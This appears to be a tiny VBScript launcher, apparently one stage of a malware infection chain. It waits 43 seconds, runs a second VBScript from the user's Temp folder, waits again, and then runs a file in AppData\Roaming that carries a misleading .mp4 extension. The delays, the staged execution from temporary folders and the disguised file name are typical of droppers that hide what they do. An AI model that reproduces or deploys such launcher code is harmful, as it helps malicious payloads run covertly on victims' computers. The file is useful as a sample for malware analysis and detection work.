Set four=wscript.CreateObject("WScript.Shell")
wscript.sleep(43000)
four.Run("C:\Users\magal\AppData\Local\Temp\25676.vbs")
wscript.sleep(7000)
four.Run("C:\Users\magal\AppData\Roaming\mcnutt.mp4")
